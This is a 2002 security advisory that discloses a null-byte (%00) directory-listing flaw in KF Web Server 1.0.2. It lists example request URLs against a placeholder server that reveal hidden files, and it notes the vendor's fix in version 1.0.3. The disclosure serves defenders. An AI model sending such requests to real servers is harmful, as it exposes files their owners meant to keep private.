Type packetstorm
Reporter Arnaud Jacques
Modified 2002-07-08T00:00:00


                                            `KF Web Server version 1.0.2 shows file and directory content  
.oO Overview Oo.  
KF Web Server version 1.0.2 shows file and directory content  
Discovered on 2002, July, 2nd  
Vendor: KeyFocus (http://www.keyfocus.net/kfws/)  
KF Web Server 1.0.2 is a free personal web server available for Windows   
98,ME,2000,XP. This web server can shows file and directory content.  
.oO Details Oo.  
If the requested URL contains a %00 after a directory name, then the server   
shows all files in the directory content.   
A hacker can see all hidden (non-HTML linked) files and directories on the   
.oO Exploit Oo.  
The exploit is really easy. You can do it with any browser  
Examples :  
http://server_name/index.html : Normal use.  
http://server_name/%00 : You get the vulnerability.  
http://server_name/index.html%00 : Is *not* vulnerable.  
http://server_name/%00index.html : You get the vulnerability. In fact   
everything after %00 is ignored.  
http://server_name/subdir/%00 : You get the vulnerability.  
.oO Solution Oo.  
The vendor has been informed and has solved the problem.  
Upgrade to KF Web Server version 1.0.3   
.oO Discovered by Oo.  
Arnaud Jacques aka scrap